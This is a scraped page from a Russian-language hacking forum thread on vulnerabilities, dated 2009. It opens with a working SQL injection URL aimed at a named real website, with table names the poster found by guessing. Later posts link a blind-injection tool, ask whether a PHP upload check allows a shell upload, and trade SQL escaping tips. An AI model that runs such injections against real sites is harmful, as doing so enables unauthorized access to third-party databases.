ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10651  
Старый 08.12.2009, 22:04
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://podium.md/news_show.php?id=33+AND+1=(SELECT+1+FROM+admin+LIM IT+0,1)--

методом тыка угадал таблы
admin,news,user
 
Ответить с цитированием

  #10652  
Старый 08.12.2009, 22:12
Аватар для Rubaka
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

попробуй эту софтиу для слепых иньекций www.darkc0de.com/others/blindext.py

тама дето и хелп к ней лежал
 
Ответить с цитированием

  #10653  
Старый 08.12.2009, 22:22
Аватар для Nightmarе
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Код:
$filename   =  $_FILES['userfile']['name'];
if ($filename == 'ass.gif')
{
copy($_FILES['userfile']['tmp_name'], $uploadfile);
}
Уязвим ли этот кусок кода? К заливке шелла(файла) с расширением php

я считаю что нет... а пёс его знает, лучше спрошу у знатоков.
 
Ответить с цитированием

  #10654  
Старый 08.12.2009, 23:08
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

маловато кода выложил, где $uploadfile и форма загрузки - непонятно
 
Ответить с цитированием

  #10655  
Старый 08.12.2009, 23:23
Аватар для Nightmarе
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Цитата:
Сообщение от Pashkela  
маловато кода выложил, где $uploadfile и форма загрузки - непонятно
Код полный.

$uploadfile может быть что угодно. как
$uploadfile = 'file.lol';
так и $uploadfile = $filename;

не в нём смысл.
 
Ответить с цитированием

  #10656  
Старый 09.12.2009, 06:09
Аватар для jangle
jangle
Познающий
Регистрация: 19.11.2006
Сообщений: 32
Провел на форуме:
95879

Репутация: 5
Отправить сообщение для jangle с помощью ICQ
По умолчанию

Подскажите пожалуйста, можно ли как то обойти следующее в SQL

Select a from DB-nomer1.user - примерный запрос

Проблема в экранировании тере "-" и в итоге получаю ошибку

Какие есть возможности?

Последний раз редактировалось jangle; 09.12.2009 в 06:14..
 
Ответить с цитированием

  #10657  
Старый 09.12.2009, 06:24
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от Nightmarе  
Код:
$filename   =  $_FILES['userfile']['name'];
if ($filename == 'ass.gif')
{
copy($_FILES['userfile']['tmp_name'], $uploadfile);
}
Уязвим ли этот кусок кода? К заливке шелла(файла) с расширением php

я считаю что нет... а пёс его знает, лучше спрошу у знатоков.
Нет.
 
Ответить с цитированием

  #10658  
Старый 09.12.2009, 06:55
Аватар для Ded MustD!e
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

Цитата:
Сообщение от jangle  
Подскажите пожалуйста, можно ли как то обойти следующее в SQL

Select a from DB-nomer1.user - примерный запрос

Проблема в экранировании тере "-" и в итоге получаю ошибку

Какие есть возможности?
взять имя БД в обратные кавычки `DB-nomer1`.user, если они не фильтруются, то должно сработать.
__________________
Feci, quod potui. Faciant meliora potentes.
 
Ответить с цитированием

  #10659  
Старый 09.12.2009, 07:21
Аватар для jangle
jangle
Познающий
Регистрация: 19.11.2006
Сообщений: 32
Провел на форуме:
95879

Репутация: 5
Отправить сообщение для jangle с помощью ICQ
По умолчанию

2 Ded MustD!e - Thx, помогло!!!
 
Ответить с цитированием

  #10660  
Старый 09.12.2009, 07:28
Аватар для LokbatanLi
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию

извините за вопрос ест какой то софт или ехплоит для знать сколько columns
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ